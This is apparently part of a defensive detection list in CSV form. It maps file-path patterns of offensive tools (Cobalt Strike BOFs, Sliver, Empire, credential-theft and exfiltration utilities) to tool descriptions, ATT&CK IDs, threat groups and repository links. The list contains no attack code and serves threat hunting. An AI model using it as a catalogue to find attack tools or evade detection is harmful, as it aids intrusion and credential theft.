+"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z"
+"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/sec-tools/litefuzz*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z"
+"*/SeeYouCM-Thief*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z"
+"*/self_delete.cna*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z"
+"*/SeManageVolumeExploit.git*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z"
+"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/server/common/stagers.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE 
- APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/servers/dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*/servers/icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*/servers/smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*/serverscan/CobaltStrike*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/serverscan_Air*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/serverscan_pro*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/ServerScanForLinux/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/ServerScanForWindows/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/ServerScanForWindows/PE*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/ServiceMove-BOF/*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
+"*/ServiceName:TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*/servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z"
+"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*/sfp_openphish.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*/sfp_spider.py*","offensive_tool_keyword","spiderfoot","The OSINT 
Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*/sh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
+"*/s-h-3-l-l/*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
+"*/shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/ShadowForgeC2*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
+"*/ShadowSpray.git*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
+"*/ShadowSpray/*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
+"*/share/windows-resources/wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A"
+"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
